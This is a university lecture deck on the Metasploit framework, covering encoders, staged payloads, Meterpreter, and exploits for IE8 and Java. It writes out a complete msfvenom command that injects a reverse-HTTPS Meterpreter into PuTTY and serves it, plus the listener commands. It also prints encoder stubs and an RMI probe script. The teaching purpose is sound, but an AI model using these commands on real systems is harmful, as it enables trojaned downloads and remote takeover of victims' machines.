Using Metasploit

Paul Nechifor

Faculty of Computer Science

17 January 2014

Agenda

  • Overview
  • Injected PuTTY
  • IE8 Heap Spray
  • Web Scan & Java break-in
  • Java Sandbox Break-out
  • Conclusions

History

2003 – created by H.D. Moore
2007 – rewritten in Ruby (from Perl)
2009 – acquired by Rapid7 (still under the BSD license)

What is it?

  • a framework (collection of tools and resources)
  • used for penetration testing (pentesting)
  • runs on Unices and Windows
Metasploit architecture

Interfaces

  • Metasploit Framework (command line)
  • Metasploit Community (web based)
  • Metasploit Express & Pro (commercial web based)
  • Armitage (GUI)
msfconsole

Auxiliary Modules

  • Used for scanning, fuzzing, sniffing, credential capture and more; they deliver no payload.
  • Examples:
    • Locating the Tomcat administration panel.
    • Finding FTP servers that allow anonymous access.
    • Brute-forcing SSH logins.
    • Fake POP3, SMB, FTP, etc. servers that capture the credentials clients send to them.

Rex library

  • Independent classes and modules that provide the features the rest of the framework needs, such as:
    • generating assembly instructions programmatically for certain architectures;
    • support for useful protocols like HTTP, SMB;
    • encoding;
    • Opcode Database interaction, etc.

Basics

vulnerability → exploit → payload

Exploits

  • Active:
    • Run against a specific host.
    • Example: against a server running badly configured or vulnerable software.
  • Passive:
    • Waiting on connections from victims.
    • Example: publishing an injected file, serving Java/Flash exploits over HTTP.

Injected PuTTY

Scenario

  • The bad guy hosts a mirror of PuTTY which contains injected code.
  • He listens for connections from a specific machine.
  • The victim is running any recent Windows.

Let's analyze!

Injecting encoded payloads

# Downloading the latest PuTTY.
wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
# (Each `# ...` in backticks below is an empty command substitution: a trick for
# commenting continued lines.)
msfvenom \
  -p windows/meterpreter/reverse_https `# The payload.`\
  -e x86/shikata_ga_nai `# Encode with Shikata ga nai...`\
  -i 25 `# ...using 25 iterations.`\
  -f exe `# Output as a Windows EXE file.`\
  -k `# Inject as a new thread (preserves the template behaviour).`\
  -x ./putty.exe `# Using PuTTY as a template.`\
  LHOST=192.168.1.102 `# The IP to connect back to (this machine).`\
  LPORT=443 `# Default HTTPS port (inconspicuous).`\
  > putty_bad.exe `# The output file.`
# Serve the trojanised binary from the current directory on port 80.
python -m SimpleHTTPServer 80

msfpayload

Generates all the types of shellcode.

msfencode

Encodes binary code in order to evade anti-virus software and to get rid of bad characters.

msfvenom

The combination of these two tools. (msfvenom replaced both; msfpayload and msfencode were removed from the framework in 2015.)

How suspicious is this?

  • VirusTotal is a free service which scans a file with dozens of anti-virus engines.
  • Using it, 7 of 48 engines flag the encoded, injected payload.
  • But they all say something different!
  • They heuristically detect that something is off, not the specific threat.
  • (Caveat: uploaded samples are shared with the vendors, so detection rates rise soon after an upload.)

Listening for victims

$ msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lport 443
set lhost 192.168.1.102
exploit
(exploit -j would run the handler as a background job, leaving the console free.)

And now wait...

Let's analyze more closely.

Structure of injected file

Basic malware vs. polymorphic malware (diagrams).

Why encode the payload?

  • The transmission protocol or the vulnerable application may be sensitive to certain byte values.
  • A payload is encoded so that it passes through intact and, with a polymorphic encoder, looks different on every build.
  • The most common bad character is the null byte, since it terminates C strings.
  • The decoder stub prepended to the payload is usually very small (tens of bytes).

Types of encoding

  • polymorphic / non-polymorphic
  • alphanumeric / non-alphanumeric (decoder and output restricted to printable letters and digits)

Polymorphic:

  • DWORD_XOR Encoder (15+4 bytes): XORs every DWORD with one random 4-byte key.
  • Countdown Encoder (12+0 bytes): XORs each byte with a key derived from a counter that runs down over the payload, so no key bytes are stored.
  • FNSTENV_MOV Encoder (15+4 bytes): uses the floating point unit (FPU) environment (fnstenv) to learn its own address, then XORs with a 4-byte key.
  • Jmp_call_additive Encoder (21+4 bytes): every DWORD is encoded with a different key, updated from the previously decoded DWORD (additive feedback).

DWORD_XOR Encoder (source)

 Rex::Arch::X86.sub(-(((state.buf.length - 1) / 4) + 1), Rex::Arch::X86::ECX,
        state.badchars) +   # ecx = number of DWORDs to decode, emitted so as to avoid state.badchars
      "\xe8\xff\xff\xff" + # call $+4: pushes the address of the next instruction and lands on its own last 0xff byte...
      "\xff\xc0"         + # ...which together with 0xc0 executes as a harmless inc eax
      "\x5e"             + # pop esi: esi = the pushed address, i.e. the stub's own location (GetPC trick)
      "\x81\x76\x0eXORK" + # xor [esi + 0xe], XORK: XORK is patched with the 4-byte key; esi+0xe is the first encoded DWORD
      "\x83\xee\xfc"     + # sub esi, -4: advance one DWORD
      "\xe2\xf4"           # loop xor: ecx--, jump back to the xor while ecx != 0

Shikata ga nai

  • A Japanese expression meaning “it cannot be helped”.
  • A.k.a. Polymorphic XOR Additive Feedback Encoder.
  • Ranked excellent in the framework. Highly polymorphic (FPU-based GetPC, random register choice, randomized instruction order). Difficult to read.
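The ideas on the last three slides (why a payload is encoded, the static-key DWORD XOR, and the additive feedback that makes Shikata ga nai polymorphic) as a worked model in Ruby, the framework's own language. This is an added example, not Metasploit's encoder code: it operates on a byte string the way an encoder module does before the decoder stub is prepended. The bad-character set, the sample bytes and the NOP padding are assumptions chosen for illustration.

```ruby
# Added example (not Metasploit code): a plain-Ruby model of the XOR encoders
# described on the slides, operating on a byte string before the stub is added.
require 'securerandom'

# Assumed bad characters: NUL (terminates C strings) plus CR/LF (line-based protocols).
BADCHARS = "\x00\x0a\x0d".b

# Constructed sample bytes, not real shellcode; they contain every bad character.
SAMPLE = "\x31\xc0\x50\x68\x00\x0a\x0d\xcc\x90".b

def contains_badchars?(buf, badchars = BADCHARS)
  bad = badchars.bytes
  buf.bytes.any? { |b| bad.include?(b) }
end

# The stubs work a DWORD at a time, so pad with NOPs (0x90) to a 4-byte boundary.
def pad_dwords(buf)
  buf = buf.b
  buf + ("\x90".b * ((-buf.bytesize) % 4))
end

# Static key (the DWORD_XOR idea): every DWORD XORed with the same 32-bit key.
# XOR is its own inverse, so the same function decodes.
def xor_static(buf, key)
  pad_dwords(buf).unpack('V*').map { |d| d ^ key }.pack('V*')
end

# Additive feedback: after each DWORD the key is advanced by the decoded
# (plaintext) DWORD, so identical input DWORDs encode differently and the key
# the stub holds changes on every loop iteration.
def xor_feedback_encode(buf, key)
  out = pad_dwords(buf).unpack('V*').map do |plain|
    cipher = plain ^ key
    key = (key + plain) & 0xffffffff
    cipher
  end
  out.pack('V*')
end

# What the decoder stub does per iteration: xor [esi], key; add key, [esi]; esi += 4.
def xor_feedback_decode(enc, key)
  out = enc.b.unpack('V*').map do |cipher|
    plain = cipher ^ key
    key = (key + plain) & 0xffffffff
    plain
  end
  out.pack('V*')
end

# The key is embedded in the stub as an immediate, so it must be free of bad
# characters as well as the encoded body. Like the framework, retry random keys.
def find_key(buf, badchars = BADCHARS, tries: 10_000)
  tries.times do
    key = SecureRandom.random_number(2**32)
    blob = [key].pack('V') + xor_feedback_encode(buf, key)
    return key unless contains_badchars?(blob, badchars)
  end
  nil
end

if __FILE__ == $0
  key = find_key(SAMPLE) or abort 'no clean key found'
  enc = xor_feedback_encode(SAMPLE, key)
  puts format('key=%08x  bad chars in input: %s, in output: %s',
              key, contains_badchars?(SAMPLE), contains_badchars?(enc))
  puts "round trip ok: #{xor_feedback_decode(enc, key) == pad_dwords(SAMPLE)}"
end
```

Run it twice: the key and the ciphertext differ while the decoded bytes do not. That randomness is all the "polymorphism" of a single-pass XOR encoder amounts to; the 25 iterations in the msfvenom command above simply re-encode the previous stub-plus-payload with a fresh stub and key each round.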

Payloads

  • That is not the full payload!
  • Self-contained (single) payloads are more stable, but usually too big for the space an exploit offers.
  • Windows Meterpreter alone is around 700 kB.
  • So payloads are sent in stages.
  • The injected code contains only the stager.
  • (Windows ships the WinINet library; the HTTP(S) stagers use it to fetch the next stage from a URL in a few API calls, which keeps the stager small.)

Stager

  • Establishes a connection to the attacker and processes further stages.

Reverse HTTPS Stager

  • Tunnels the Meterpreter protocol over HTTP inside SSL/TLS.
  • Advantages:
    • HTTPS on port 443 is allowed out of almost every network, corporate ones included.
    • The inner traffic cannot be inspected unless the network intercepts TLS.
    • The transport is a series of short HTTP requests rather than one long-lived TCP connection, so the session survives network drops and reconnects on its own.

Reflective DLL injection

  • A technique for loading a DLL straight from memory: the DLL exports a reflective loader function that does the OS loader's work itself, so nothing is written to disk and LoadLibrary is never called.
  • The initial code (the stager) downloads the next stage directly into memory, by any means: raw sockets, HTTPS, etc.
  • The reflective loader allocates Read-Write-Execute memory, copies the sections there, resolves imports and applies relocations.
  • After that the code can be used like any other loaded library.
  • Advantages: hard to detect. RWX memory on its own is not suspicious, because JIT-compiling runtimes like Java also write code into memory and execute it.

Some payloads:

  • PassiveX: circumvents egress firewalls by using an ActiveX control to create a hidden Internet Explorer instance, which can talk to the attacker over whatever HTTP path IE is already allowed to use.
  • NoNX: works around Data Execution Prevention (the no-execute bit) on Windows.
  • Meterpreter: the biggest and most powerful payload.

Meterpreter

  • Stealthily loaded into the memory of the process without writing to disk.
  • It can spawn and migrate to other processes.
  • Uses encrypted communication by default.
  • Can be extended at runtime by loading other DLLs.

Meterpreter Features

  • cat, cd, ls, pwd, ipconfig, ps: what you would expect.
  • edit: edit files using Vim. (cuz Emacs sux!)
  • download, upload: get files from and send files to the victim's system.
  • execute: run a command.
  • hashdump: dump the SAM database (local account password hashes).
  • migrate: move the session into another process.
  • shell: get a standard shell (like cmd).
  • webcam_snap: take a webcam picture.
  • Other things: capture keyboard and microphone; generate clicks and keystrokes...

IE8 Heap Spray

Details

  • An HTML+JS memory corruption bug in IE 8 (MS12-037, "same ID property").
  • Requires a non-ASLR module for its ROP chain: a runtime DLL shipped with the JRE on Windows XP SP3, Vista SP2 and 7 SP1, or the Visual C++ runtime on XP SP3.
  • Reason: IE mishandles two elements that share the same ID property, leaving a dangling reference (use-after-free).
  • Uses a JS library for heap feng shui.
    • Manipulates the heap layout by making allocations of chosen sizes in a chosen order.
    • Depends on the specific platform. Here: IE on Windows.

Heap spraying

  • Fills large amounts of heap memory with copies of the shellcode, each preceded by a NOP sled, so that the shellcode ends up at a predictable address.
  • It compensates for the non-determinism introduced by timing, chance alignments and other factors: a jump landing anywhere in a sled slides into the shellcode.
  • Takes advantage of the fact that large heap allocations end up at predictable, roughly sequential addresses.

Idea

  • The HTML page contains two elements with the same id (say idName).
  • The heap is sprayed with the shellcode.
  • Mouse events are triggered, during which one of the elements is deleted.
  • The ID is then referenced via eval('idName') (in IE this is supposed to return the element); the freed object is dereferenced, which is the bug.

Web Scan & Java break-in

Details

  • Takes advantage of the Java RMI server's default configuration.
  • (An active exploit.)
  • Java Remote Method Invocation is an object-oriented RPC mechanism.
  • With the default configuration of older JREs, the RMI class loader fetches classes from any remote HTTP codebase the client names (java.rmi.server.useCodebaseOnly=false, the default before Java 7u21).
  • Bytecode Advantage(TM pending): the same bytecode works reliably across 5 different platforms and 3 architectures.
  • RMI calls to the registry are not authenticated.
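The "scan" half of this slide, as an added Ruby example that is not Metasploit's module code: the RMI transport handshake a scanner uses to recognize a registry. The client sends "JRMI", protocol version 2 and the StreamProtocol selector; an RMI endpoint answers with a ProtocolAck byte, the client's address as a Java UTF string and its port, after which the client sends its own address and port in the same encoding. The reply bytes decoded at the bottom are constructed, and rmi_probe, the loopback address it reports and the default registry port 1099 are assumptions, not anything stated on the slide.

```ruby
# Added example (not Metasploit code): the Java RMI transport handshake,
# built and parsed by hand, plus a live probe that speaks it to one host.
require 'socket'

JRMI_MAGIC      = "JRMI".b
JRMI_VERSION    = 2
STREAM_PROTOCOL = 0x4b   # the transport the registry speaks
PROTOCOL_ACK    = 0x4e
PROTOCOL_NACK   = 0x4f

# Client -> server: magic, 2-byte version, 1-byte protocol selector (7 bytes).
def rmi_handshake_request(protocol = STREAM_PROTOCOL)
  JRMI_MAGIC + [JRMI_VERSION, protocol].pack('nC')
end

# Server -> client: ack byte, then the client's address as a Java UTF string
# (2-byte length + bytes) and its port as a 4-byte big-endian int.
# Returns {ack: true, host:, port:}, {ack: false} on a nack, or nil when the
# bytes are not an RMI reply (e.g. an HTTP server on the port) or are truncated.
def parse_rmi_handshake_reply(data)
  d = data.b
  return nil if d.empty?
  return { ack: false } if d.getbyte(0) == PROTOCOL_NACK
  return nil unless d.getbyte(0) == PROTOCOL_ACK && d.bytesize >= 3
  len = d.byteslice(1, 2).unpack('n')[0]
  return nil if d.bytesize < 3 + len + 4
  { ack: true,
    host: d.byteslice(3, len),
    port: d.byteslice(3 + len, 4).unpack('N')[0] }
end

# Client -> server, second half of the handshake: our own address and port.
def rmi_handshake_response(host, port)
  h = host.b
  [h.bytesize].pack('n') + h + [port].pack('N')
end

# Live version of the exchange against one host; returns the parsed reply or nil.
# Assumes the registry listens on the default port 1099 and reports 127.0.0.1 as our
# address (the registry does not check it).
def rmi_probe(host, port = 1099, timeout = 5)
  sock = Socket.tcp(host, port, connect_timeout: timeout)
  sock.write(rmi_handshake_request)
  return nil unless IO.select([sock], nil, nil, timeout)
  reply = parse_rmi_handshake_reply(sock.readpartial(1024))
  sock.write(rmi_handshake_response('127.0.0.1', 0)) if reply && reply[:ack]
  reply
rescue SystemCallError, SocketError, IOError
  nil
ensure
  sock.close if sock
end

if __FILE__ == $0
  # Constructed reply, shaped like what a registry returns after our request.
  sample = "\x4e".b + [9].pack('n') + "127.0.0.1".b + [54321].pack('N')
  p rmi_handshake_request             # "JRMI\x00\x02K"
  p parse_rmi_handshake_reply(sample) # {:ack=>true, :host=>"127.0.0.1", :port=>54321}
  p rmi_probe(ARGV[0], (ARGV[1] || 1099).to_i) if ARGV[0]
end
```

An ack only says that an RMI endpoint answered. Whether the class-loading trick on this slide works depends on the target JVM: from Java 7u21 onwards java.rmi.server.useCodebaseOnly defaults to true, so a remote codebase is ignored unless the operator switched it back off.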

Java Sandbox Break-out

  • Affects Oracle Java versions prior to 7u25.
  • Runs from an applet and escapes the Java sandbox through a memory corruption bug.
  • It is caused by invalid array indexing in the native storeImageArray() function in jre/bin/awt.dll.
  • This code calls storeImageArray and causes the corruption:
    new AffineTransformOp(new java.awt.geom.AffineTransform(1,0,0,1,0,0), null);
  • Discovered through the Packet Storm Bug Bounty program.
  • 18 June 2013: fixed by Oracle (Java 7u25).
  • 11 August 2013: publicly disclosed.
  • 15 August 2013: implemented in Metasploit.

Conclusions

  • Metasploit is the most successful such framework.
  • Considered the de facto exploit development framework.

Others

  • w3af: web application scanning and attack only, so less general than Metasploit.
  • Core Impact: the strongest commercial competitor, but not free.

Prevention (usual stuff)

  • Use up to date software: the IE and Java sandbox bugs in this talk were patched before the Metasploit modules appeared.
  • Security through obscurity (slows scanners down, fixes nothing):
    • Configure software not to reveal its identity and version.
    • Use non-default ports.
  • Don't pass sensitive data over insecure channels (e.g. FTP, telnet).
  • Don't run binaries from unofficial mirrors; check the publisher's signature or checksum (the PuTTY scenario).

Sources

http://www.offensive-security.com/metasploit-unleashed/
http://en.wikipedia.org/wiki/Metasploit_Project
http://www.exploit-db.com/wp-content/themes/exploit/docs/18532.pdf
http://blog.strategiccyber.com/2013/06/28/staged-payloads-what-pen-testers-should-know/
http://www.rapid7.com/db/modules/exploit/windows/browser/ms12_037_same_id
http://www.rapid7.com/db/modules/exploit/multi/misc/java_rmi_server
http://www.rapid7.com/db/modules/exploit/multi/browser/java_storeimagearray
http://www.osvdb.org/82865
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ms12_037_same_id.rb
http://www.exploit-db.com/exploits/27526/
http://en.wikipedia.org/wiki/Heap_spraying
https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
http://www.levinkv.ru/bezopasnost/metasploit/metasploit-penetration-testing-cookbook-%D1%87%D0%B0%D1%81%D1%82%D1%8C-1.html
http://www.harmonysecurity.com/files/HS-P005_ReflectiveDllInjection.pdf

Questions?